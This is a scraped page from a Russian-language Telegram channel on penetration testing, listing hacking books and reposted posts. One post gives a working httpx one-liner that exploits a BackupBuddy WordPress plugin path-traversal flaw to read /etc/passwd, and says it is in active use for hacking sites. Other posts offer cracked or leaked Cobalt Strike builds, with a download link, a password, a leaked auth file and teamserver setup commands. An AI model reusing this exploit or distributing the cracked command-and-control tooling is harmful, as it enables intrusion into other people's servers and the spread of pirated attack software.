en
Feedback
Эффект пентестера

Эффект пентестера

Open in Telegram
2 261
Subscribers
No data24 hours
+37 days
-1030 days
Posts Archive
Путь в программисты. Как эфективно изучать программирование. Константин Шереметьев

Hands on Hacking. 2020 Jennifer Arcuri, Matthew Hickey

Hacking in the Humanities. 2022 Aaron Mauro, Anthony Mandal, Jenny Kidd

SQL: быстрое погружение. 2022 Уолтер Шилдс

Repost from N/a
Wordpress vuln\CVE plugin: BackupBuddy cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0" Уже неделю активно используется для похека wordpress хостов

Cobalt Strike 4.7 by uCare (custom license) Download: https://mega.nz/file/nxkglKyT#NtabGLxmW_s17mGYK_CPOv7foVxAcPRMCdkMtAMMb-I Pass: uCare@Pwn3rzs Since all the fuss around me (h0nus) selling it, all kind of shit and misinformation spread around, we are releasing it for free. This is the XSS vulnerable one, so patch it your own way or use a Reverse Proxy or whatever. Cheers. - h

Поиск Beacon в темноте: руководство по разведке киберугроз

+1
cobaltstrike.auth0.00 KB

4.6.1 official jar + the auth file leaked by zdl (scammers can be good for something, thanks guys), so this is working. I'll do the security patch and dark mode if someone doesn't beat me to it no time at the moment. CLIENT (linux, windows, whatever)
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike-client.jar 
TEAMSERVER (linux only)
sudo apt-get install openjdk-11-jdk
sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
./TeamServerImage -Dcobaltstrike.server_port=50050 -Dcobaltstrike.server_bindto=0.0.0.0 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 teamserver YOURIPADDRESS PASSWORD

🔥CVE Collection of jQuery UI XSS Payloads

Cobalt Strike 4.6.1 Licensed (May 23, 2022) (Working) #cobaltstrike #soft #redteam #pentest

🔎NotProxyShellHunter is a checker for CVE-2022-40140 & CVE-2022-41082 using ps scripts

+1
Cobalt Strike 4.6.1 Licensed (May 23, 2022) & Distribution Packages (released with Cobalt Strike 4.6) (cobaltstrike-dist.tgz 20220412) #cobalt_strike